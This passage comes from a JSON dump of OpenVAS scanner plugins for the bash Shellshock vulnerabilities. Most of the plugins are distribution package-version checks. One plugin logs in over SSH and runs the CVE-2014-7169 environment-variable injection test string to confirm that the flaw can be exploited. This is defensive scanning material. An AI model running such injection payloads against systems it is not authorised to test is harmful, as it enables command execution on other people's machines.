See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703035\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_name(\"Debian Security Advisory DSA 3035-1 (bash - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:22 +0530 (Wed, 01 Oct 2014)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-3035.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"bash on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\");\n script_tag(name:\"summary\", value:\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169\n). 
With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:39", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-08T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802082", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: 
gb_bash_shellshock_credential_cmd_exec_vuln_02.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802082\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-08 10:10:49 +0530 (Wed, 08 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n 
script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n script_xref(name:\"URL\", value:\"https://shellshocker.net/\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/252743\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2014/09/24/32\");\n script_xref(name:\"URL\", value:\"https://community.qualys.com/blogs/securitylabs/2014/09/24/bash-remote-code-execution-vulnerability-cve-2014-6271\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-6271\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-025\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! 
sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"cd /tmp; rm -f /tmp/echo; env X='() { (VT Test)=>\\' /bin/bash -c 'echo id'; cat echo; rm -f /tmp/echo\" | /bin/bash\ncmd = 'echo \"' + \"cd /tmp; rm -f /tmp/echo; env X='() { (VT Test)=>\\' \" + bash_cmd + \" -c 'echo id'; cat echo; rm -f /tmp/echo\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( result =~ \"uid=[0-9]+.*gid=[0-9]+.*\" ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:26", "description": "Gentoo Linux Local Security Checks GLSA 201409-10", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201409-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121273", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201409-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121273\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:55 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201409-10\");\n script_tag(name:\"insight\", value:\"Stephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code (CVE-2014-6271). Gentoo Linux informed about this issue in GLSA 201409-09.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201409-10\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201409-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: 
make_list(\"ge 3.1_p18-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.2_p52-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.0_p39-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.1_p12-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.2_p48-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(), vulnerable: make_list(\"lt 4.2_p48-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-08-02T10:48:56", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 \n). 
With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3035-1 (bash - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2017-07-18T00:00:00", "id": "OPENVAS:703035", "href": "http://plugins.openvas.org/nasl.php?oid=703035", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3035.nasl 6750 2017-07-18 09:56:47Z teissa $\n# Auto-generated from advisory DSA 3035-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703035);\n script_version(\"$Revision: 6750 $\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_name(\"Debian Security Advisory DSA 3035-1 (bash - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-18 11:56:47 +0200 (Tue, 18 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:22 +0530 (Wed, 01 Oct 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3035.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bash on Debian Linux\");\n script_tag(name: \"insight\", value: \"Bash is an sh-compatible command language interpreter that executes\ncommands read from the standard input or from a file. 
Bash also\nincorporates useful features from the Korn and C shells (ksh and csh).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\");\n script_tag(name: \"summary\", value: \"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 \n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-11527", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868208", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update 
for bash FEDORA-2014-11527\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868208\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:50 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-11527\");\n script_tag(name:\"affected\", value:\"bash on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11527\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138687.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n 
package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.48~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:37", "description": "The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "openvas", "title": "RedHat Update for bash RHSA-2014:1306-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871250", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871250", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bash RHSA-2014:1306-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871250\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-26 06:07:13 +0200 (Fri, 26 Sep 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for bash RHSA-2014:1306-01\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. 
For more information see the referenced Knowledgebase article.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"RHSA\", value:\"2014:1306-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-September/msg00053.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6|5)\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", 
rpm:\"bash-debuginfo~4.2.45~5.el7_0.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.1.2~15.el6_5.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_11.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~3.2~33.el5_11.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:19", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-08T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802086", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_04.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, 
